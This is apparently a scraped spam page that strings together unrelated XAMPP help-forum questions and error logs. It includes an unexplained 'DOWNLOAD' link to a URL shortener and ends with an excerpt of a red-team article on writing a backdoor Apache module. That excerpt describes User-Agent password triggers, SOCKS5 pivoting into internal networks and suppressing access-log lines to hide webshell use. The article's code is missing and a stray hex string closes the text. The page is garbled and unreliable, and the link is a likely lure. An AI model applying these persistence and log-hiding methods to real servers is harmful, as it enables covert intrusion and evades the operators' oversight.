I was trieng to download xampp server for my 64 bit machine. But in apachefriends.org site I am not getting 64 bit version. I wanted to check whether 32 bit version will work fine in 64 bit or not. And also kindly suggest if u know any link to download 64 bit version of xamp.

I installed wordpress locally with xamp on my pc (Macbook pro Apple silicon 2021), yesterday I could normaly install a plugin (starter template) but today if I try to install a plugin it says at first "update failed" on the button where it should usually say activate but when I reload the page it is installed and I can click on activate but it does not activate it. When trying to install I am getting the following message:


DOWNLOAD 🔥 https://urloso.com/2y4PvA 🔥

I am having serious challenges in my server. My xamp server always fond of shutting down and this makes me to lose my project work. When this happens, I have to reinstall new and start re-start projects all over again. This has happened to me more than 2 times within 3months.

I thought the problem was peculiar to xamp and have to install wamp and experience the same thing again. This is causing serious nightmare to me and can anyone advice me on how to solve this recurrence shutting down of the localhost server?

I have installed matomo in my MAC on xamp.

After successful installation I get the below error:

Warning: You are now accessing Matomo from  :8080/matomo/index.php , but Matomo has been configured to run at this address:   .

Hello everyone.

I really love Void, almost anything that I do/want to do is achievable here (just get the stuff done like others but still different) or at least not that difficult. My semester is gonna end and I want to start learning php practically not like text editor and terminal.

I have windows on dual boot but its 32 bit and I don't see any official 32 bit version of xamp.

The linux version of xamp, gets installed, when I start php or start all or restart all, only mysql server gets effected, php and the other one don't. I also asked the question on different places like telegram, discord, they tried but nothing really helped.

I want to know the full way how things happen and I want to setup a local server (which xamp does for us but abstract everything, we just need to install and clicks to turn it On) on my own. I thought to see the apache's .conf files but it says its broken or something and they don't open.

Any help will be appreciated and is appreciable.

Thank you.

issue one : i don't know what i did on Privilege window after that i con't able to run mysql on xamp so i tried to find a solution on internet so got the solution is if i replace\copy the files form "xampp\mysql\backup" to 'xampp\mysql\data" folder it will resolve so i did same and now i am able to run a mysql on xamp but now i con't access the " " page.enter image description here

I don't know anything about what's in your xampp\mysql\backup folder, but moving anything around in the MySQL datadir (your xampp\mysql\data) while the server daemon/service is running is going to cause you trouble. The MySQL server uses various files in there while it's running and even moving around folders within that folder (such as trying to copy a database from one system to another) won't work properly because (generally) all the files and folders are related (such as the ibdata1 file, which is sort of the glue that holds together all of your databases and users).

In the video Local Word Press Development "Installing a Local Web Server on a PC" with Zac Gordon. I installed xampp correctly and started apache/mysql with no problem. But when I type in localhost I am not redirected to localhost/xampp/splash.php. I am redirected to localhost/dashboard. What do I need to do?

PHP Warning: Declaration of AssignmentForm:($options) should be compatible with Form:($staff = true, $title = false, $options = Array) in C:\xampp\htdocs\soporteTI\include\class.forms.php on line 4367 PHP Warning: Declaration of TransferForm:($options) should be compatible with Form:($staff = true, $title = false, $options = Array) in C:\xampp\htdocs\soporteTI\include\class.forms.php on line 4487 PHP Warning: count(): Parameter must be an array or an object that implements Countable in C:\xampp\htdocs\soporteTI\include\pear\Mail\mimePart.php on line 314 PHP Warning: mail(): Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\xampp\htdocs\soporteTI\include\pear\Mail\mail.php on line 153 PHP Fatal error: Uncaught Error: Call to undefined function _S() in C:\xampp\htdocs\soporteTI\include\class.mailer.phpStack trace:#0 C:\xampp\htdocs\soporteTI\include\class.mailer.php(593): Mailer->send('@co...', 'osTicket Fatal ...', 'Unable to conne...')#1 C:\xampp\htdocs\soporteTI\bootstrap.php(294): Mailer:('@co...', 'osTicket Fatal ...', 'Unable to conne...', '"osTicket Alert...')#2 C:\xampp\htdocs\soporteTI\bootstrap.php(189): Bootstrap:('Unable to conne...')#3 C:\xampp\htdocs\soporteTI\main.inc.php(28): Bootstrap:()#4 C:\xampp\htdocs\soporteTI\client.inc.php(21): require_once('C:\\xampp\\htdocs...')#5 C:\xampp\htdocs\soporteTI\index.php(16): require('C:\\xampp\\htdocs...')#6 {main} thrown in C:\xampp\htdocs\soporteTI\include\class.mailer.php on line 573Hi everyone i took my installation from centos 7 (working well) to an installation in windows using xamp and im getting these errorsthat was the report of php_error_log because is showing blank page in browserany ideas of why im getting those errorsTy in advance.

mod_proxy_ajp as connector), Strawberry Perl 7.0.56 Portable. this was the result now PHP Warning: mail(): Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\xampp\htdocs\soporteTI\include\pear\Mail\mail.php on line 153and in the screen is showing Fatal Error: Contact system administrator.

Next step is to code a few pages to allow the adding/removing of Arduino and Pins without having to resort to mySqlAdmin. Once done I need to figure out how to get the status of the pins from the webserver running on the Arduino. The examples I have seen for the ENC28J60 have been presenting a PROGMEM page, so cannot be modified once the code has started.

This third fascicle of the series about backdoors for web servers based on the XAMP stack (Apache2, MySQL, PHP), will focus on the development of modules for Apache2 in the context of a Red Team operation . The use of modules and plugins for web servers as a method of persistence is an old and well-known tactic (example: Linux / Cdorked.A 2013 ) that is still being used today.

Using Apache modules you can add and integrate new functionalities to a web server. Some examples of legitimate modules that can be found in a typical installation are mod_ssl, mod_php, etc. In this case, the module to develop will serve as a basic persistence to retake access to a compromised network, and as a tool during the intrusion.

The communication with the backdoor will be made using the HTTP protocol itself in the first instance. To trigger a concrete action in a ringbuilder, for example, you can use the URI present in an HTTP request. Each action must be mapped with a different URI, in this case the following actions will be used:

However, in addition to using infrequent text strings to avoid collisions with legitimate HTTP requests, it is necessary to protect the backdoor with some kind of simple authentication such as a password. The ideal could be to use a common header (the User-Agent, for example), and check if a certain text string that acts as a password is in it. In this PoC a striking text string is used, but in a real operation, it would be better to use slight variation of a real User-Agent so that it goes unnoticed.

While this first HTTP request acts as a trigger for the backdoor, the rest of the communication will be performed by reusing the socket itself. This is tremendously interesting as it reduces the number of connections needed. On the other hand, it is not a viable method when the web server is behind a reverse proxy or a balancer; in these cases, it will be necessary to embed the communication within the HTTP protocol, using the body of POST requests to send the data to the backdoor and receive data from it through the content of the server responses (same mechanics that would be followed by a webshell, for example).

From this moment you can perform reads / writes over `fd` to communicate the client with the backdoor. What is written will be sent by the socket to the client, while the backdoor can obtain data from the client by reading it. As an example of this communication, the simplest function is shown: answer a PING request with a PONG to know that the server is still infected.

The first desirable functionality for the Apache module in a Red Team operation, is the possibility of functioning as a pivoting point from which to tunnel traffic towards the internal networks of the client. The simplest method to achieve this purpose is to implement a proxy socks5 in the module, and use local proxychains to forward the traffic of the tools towards the desired assets. In order to avoid the reinvention of the wheel you can use some previous implementation of Socks5, for example this _proxy where you only have to adapt the code of the function `app_thread_process` onwards, leaving something like:

Proxychains are configured to use any port (/etc/proxychains.conf). This way, for example, it is possible to launch a curl from the outside that will reach the ringbuilder, and from it to an objective of the internal network of the client:

Another possible use of this Apache module can be, for example, hiding those activities that are carried out on the web server. If the backdoor is deployed as a persistence mechanism, the ideal is to take advantage of its more passive features (ie, not use it directly as a proxy or to execute commands), such as hiding traces of the activity. If webshells or other web utilities are deployed on that server and you do not want their use to be reflected in the access.log, it is possible to use a hook that executes an exit(0) before inserting the log line if the User-Agent corresponds to our password. e24fc04721

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